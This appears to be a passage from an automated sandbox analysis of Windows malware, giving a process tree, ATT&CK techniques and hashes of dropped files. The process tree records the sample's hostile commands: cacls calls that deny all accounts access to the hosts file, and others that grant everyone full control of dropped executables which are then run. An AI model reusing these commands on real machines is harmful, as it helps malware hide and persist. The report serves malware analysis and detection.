C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5648
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5196
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5660
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2932
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5692
-
-
-
C:\Windows\SysWOW64\ogmqci.exeC:\Windows\SysWOW64\ogmqci.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2240
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\eluybcv.exe1⤵PID:5004
-
C:\Windows\ime\eluybcv.exeC:\Windows\ime\eluybcv.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1244
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tbstnnzwu\ytnkip.exe /p everyone:F1⤵PID:3628
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3060
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tbstnnzwu\ytnkip.exe /p everyone:F2⤵PID:3888
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rtibeyhl\eluybcv.exe /p everyone:F1⤵PID:3636
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4400
-
-
C:\Windows\system32\cacls.execacls C:\Windows\rtibeyhl\eluybcv.exe /p everyone:F2⤵PID:4052
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tbstnnzwu\ytnkip.exe /p everyone:F1⤵PID:6368
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1604
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tbstnnzwu\ytnkip.exe /p everyone:F2⤵PID:2036
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\eluybcv.exe1⤵PID:6688
-
C:\Windows\ime\eluybcv.exeC:\Windows\ime\eluybcv.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6800
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rtibeyhl\eluybcv.exe /p everyone:F1⤵PID:6568
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6384
-
-
C:\Windows\system32\cacls.execacls C:\Windows\rtibeyhl\eluybcv.exe /p everyone:F2⤵PID:6988
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.2MB
MD51ef2e8e93ae336585f735c0980e96996
SHA1bb2fbdfe259487528cac1ccce7519c4450c4a7bc
SHA2566366a365addc5d2891e1752d3ebcc2d20eb500456ae6ac7081e8df32ed010b0c
SHA512ff0f04ed1396dc78039396a95905401c4256d54c4cd92ded6479b1fc9a6f0c7bd48edada0e1121f811181a75bcac00665df3e577349c853c12b61e30477179c4
-
Filesize
4.0MB
MD5c5aa99414c74875c6d7cdf68dc48ede1
SHA10c0d7c24b679d07806765262bb804595840654b7
SHA256a661042d95a2b6b42f9464a1da8b360a0a4569cd625d9174b7942f1b16c4f3d3
SHA512f1f7df6718fb9950116f92790b88daec723edfc106e9dda3bd04813868a30af6450d11224a59c30d6e2c9831659ecf6dd79e3fc306539138f76a61522c950809
-
Filesize
1.2MB
MD5bf059f17b1d371df814f6b1e4b510229
SHA1fe9a23fe49fb1870b29cb08b88c2c32c99dc9273
SHA2563407eb53708dc9d831e6c735aeb89d7aff3c612bec8162645975b79376698a66
SHA512b65fb19d3054dae7ac1dc12a7ff285e5a27e9e0b986ea3ea4b037f027c9f117704bd063e2ab319c0f50baa26908953efa60f8e3d0b80212a342e81ac1e064a89
-
Filesize
2.9MB
MD59d60f152857d076e9bb5c7412c6a047d
SHA10fcdc3f26c3000a509234f0f7751418c2c688ebe
SHA256e04d6c3df95c4c0bbbb59c2859702e789b32e13976dacce2e11c82858466fd4e
SHA51208904dd063c0912a04b0d9b746d8e240a7c5b59db600daf1886b8a40e08e87c6a96440e61ab7fc4d952e3af15abcc18cfe2ea76f6ea2f99d57b4f1889468c226
-
Filesize
7.5MB
MD50c72e75889c402167fecaa5e17d0c0d1
SHA14a65b8738c8bf2e46e61298e48e92baa745e50cf
SHA2568c1df49270710dc25bb7a4eb635c63678d30da01f8fec24762bf8b722c8e7924
SHA512b004ef66a4d30258d54386070ca51508a65a5e3f4d40daf247a35b3f10580b3a570e1399a4f8029b741396aad70d7225af880db02da6162ca90e613af93f9329
-
Filesize
33.2MB
MD53cf8e18b479804f098df1a44eec96049
SHA164699c3af06280d381ed9cb7e394c2c0f870d08f
SHA25672f0d6c8e8e3b9548ab65c645c843281dc59eb777351876943b4fc61c8b76bd7
SHA51252237e0ba52030b8b272a856f5090b4db40c0ad3f3309a1815efef972cf66333fcc46a54c1bdf9801acfabc50c291bee18187a9d892a8c80b9b7bd74d3fa28db
-
Filesize
26.4MB
MD51adf0dda01b54eec71264990e3c05341
SHA18e2e7f799f513483152884ca9a70f1c1a9efc1b0
SHA2563afc3ab96ba3aaccf86580ef1f74edbeffd165a0bef743df34628ddb1749ace9
SHA5129481673b513d3581cb38641f8f97ceb406f6701c2e4f19e37a36fc7017ad4b715c2ee318183907dc40bb0733b79bc3947c71aca9c6c07f6f2064fb073c6d5650
-
Filesize
2.3MB
MD5ea6f32cc73a2db0212c615358dbecbbb
SHA1700cdbc0ff0dfa1b8e7d7cd577a9ffc6ff26033a
SHA256b729005caef5af9e8e175cc317667851964de2a23e753a0e0c3d35bbcbcb8cb0
SHA512cde9f54e72129cb91d102a8c8088a19b6819d6fd17ebcef9da754ab5f8848dcd4a6803770c5108327c0ee96205856dfcb037323d5c93a193fb6e93db2587bdee
-
Filesize
20.9MB
MD5a06168865cbda1dd8eb3d7cac8c1c72f
SHA1c9cf7f37109791ddfbbbf0956c4381cf7e9bb083
SHA256b62682c19ced146a6b372f3cbf00c2f400937869d5ce7c0f5b7a3eecf0e08d94
SHA512d628e415ea15d87587825ecaaabeae79dbbd85e1510f4d564a4a11d9c65921a9a65edc645f67fe1e2b2b0578e62d7d3f3cc714c769d330ae599b0278523e7dbe
-
Filesize
10.7MB
MD523f4f9434fb9fe50203a1b00ec5ed9e4
SHA1ce872c732d924e0ca9c73941335621480fb74a4e
SHA2561d68b65b9b2fd743ab7ee3316ec4276993b2b5c0f17d47cfaed43a4d765e1ce0
SHA51216df823a55943ddeccefbf13dbe8bb5edf13cae80675ce38dd483c5563595153b5ed7cdc38d6ad36ebd4fe3aea667f47c45620a8bf1ef8ac852db10b57fe45b1
-
Filesize
45.4MB
MD51eadce1be0662597df17be13b5a9ed4b
SHA1e891d8b6ca79d5d5d44c0bcd9caae95a4044d6d7
SHA256aae81c22a27b9b70bb78437b3921267506e74089162166fefc1812ad54017e4a
SHA512377b6f18a02fa6a727bb3738a9659ddd1d165ceafb1d5ff49cd65a91cd63f0e8921bed1cdee3a7da23850fe100d490daa7d664ae0d3d25fe1dfd8806bf0eeaf8
-
Filesize
1.6MB
MD5a85d0f5583abe42eae9d30b6a535bf28
SHA18e3b71a00d13975ce7362222ec07d5b4fe29acf0
SHA256ffca5a34aecbe3a0c172df88b49dc66559229138b4533505a58e13da4883ce6b
SHA512f735c57dfa72648b7d6722bf959df9b04aac4c0582f6c1f0ade0bfa07e26ca93b6a132702c5cfea47319cb6da703d5f5f39e36b73a39b1f56835954a7572258a
-
Filesize
8.6MB
MD5281a2a9e60a3c31f5f05ba2634683959
SHA14a0f0ed8b2a9a0b2364aae092da32ab228904fdc
SHA2569f786be4cb55d03664082b9f58c7db0edaa1c81fb75a725e32194a3eff5962b5
SHA512818b732f34373243a2f2ad43ab932efdf2d88bda32a1dfb714b37656dc7fe6d03e294228746ed24ba52d32d123fbfe4b0e2d21975f7991633e4eeaca0d67125a
-
Filesize
814KB
MD58944ca03da78403aff8878245cc6d500
SHA1d80c38e51e2460e41c3dc573309738b4d345eb3f
SHA2560c17af456cb17e279ffd2a70f50f66f34d1de7d71fc2700e75b904ded9a0c7ce
SHA51267b43e299a349f361e1a2b1f44f1935ac9def7e072124f93627794458f1ee36c3046587984029990557e6c92cf0ebafef63f31a5b502514f1193d330fd0de51d
-
Filesize
1.9MB
MD5d3a97b73be9b72b0db078e4385a92acc
SHA1e5b56eb62aa5d1fb2a7583fb5c55b95110f985be
SHA2567c414c3d2557603f0641f6d35106c81db6c069d508d5ad47bdb6be8fe0d16f55
SHA512c839595fb5a6e65f76a7e7ff0f5e087bb48ed732a2a16ab891f7d6890db0514f6712c82ffa8a1b67d7ac18e6f1df80c00d0bd69a24e9c414b59506babc38f0e3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
10.9MB
MD5905944a3315706d99c22a0387761f95e
SHA185717e0446ee60c201e8b884c54f34719501b91a
SHA2566b6b9a538d82d10c8338f055c53f24e882300f3c8dcc56248da82dfae59320cd
SHA512ea63698ea61acdea2bf10b3f78a9d96b0415278aa85991f3dc91f93df1e7aff2038b5a2b7627ce3d425975b6847232b2346349853feb81dd160ff2c7c950e970
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376